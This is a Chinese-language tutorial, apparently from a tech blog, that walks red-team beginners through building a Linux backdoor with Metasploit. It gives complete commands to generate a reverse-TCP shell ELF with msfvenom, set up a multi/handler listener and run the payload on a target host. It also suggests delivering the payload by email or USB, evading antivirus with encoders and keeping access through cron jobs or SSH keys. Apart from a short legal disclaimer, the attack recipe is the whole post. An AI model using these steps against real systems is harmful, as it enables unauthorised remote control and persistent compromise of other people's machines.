当前位置:首页 > 系统教程 > 正文

红队必备技能:用Metasploit打造Linux后门(从零开始制作Linux恶意软件获取shell)

红队必备技能:用Metasploit打造Linux后门(从零开始制作Linux恶意软件获取shell)

在红队渗透测试中,获取目标系统的远程shell是核心目标之一。Metasploit作为强大的渗透框架,能够快速生成免杀木马并建立控制通道。本文面向红队/白帽新手,详细演示如何利用Metasploit制作Linux恶意软件,最终获取目标shell。请仅用于授权测试,非法使用后果自负。

1. 准备工作:环境与工具

你需要一台攻击机(推荐Kali Linux,内置Metasploit)和一台目标Linux主机(物理机或虚拟机)。确保两者网络互通。Metasploit已预装在Kali中,若未安装可运行sudo apt install metasploit-framework

2. 生成Linux木马:msfvenom

使用msfvenom生成反弹shell的ELF可执行文件。命令示例:msfvenom -p linux/x64/shell_reverse_tcp LHOST=攻击机IP LPORT=4444 -f elf -o shell.elf参数说明:- -p:指定payload,这里选用64位反向TCP shell。- LHOST,LPORT:攻击机IP和监听端口。- -f elf:输出ELF格式(Linux可执行文件)。- -o:输出文件名。生成的Linux木马即shell.elf,需要上传到目标机。

红队必备技能:用Metasploit打造Linux后门(从零开始制作Linux恶意软件获取shell) Metasploit Linux木马 获取shell 红队渗透 第1张

3. 设置监听:handler

在攻击机上启动Metasploit控制台,配置handler监听进入的shell:msfconsoleuse exploit/multi/handlerset payload linux/x64/shell_reverse_tcpset LHOST 攻击机IPset LPORT 4444exploit -j-j参数让监听在后台运行。

4. 上传与执行木马

将shell.elf上传到目标Linux主机(可通过web下载、邮件、USB等方式)。在目标机上赋予执行权限并运行:chmod +x shell.elf./shell.elf若一切顺利,攻击机的msfconsole会收到反弹shell,输入sessions -i 1进入交互,成功获取shell

5. 进阶:免杀与持久化

实际红队渗透中,静态编译的木马容易被杀软检测。可使用编码器(如-e x86/shikata_ga_nai)或自定义打包器。持久化可通过添加cron任务、SSH公钥等方式实现。

总结与法律声明

本文演示了利用Metasploit制作Linux恶意软件获取shell的全过程,这是红队/白帽的必经之路。务必在合法授权范围内使用,禁止非法攻击。掌握MetasploitLinux木马技术,有助于提升渗透测试能力。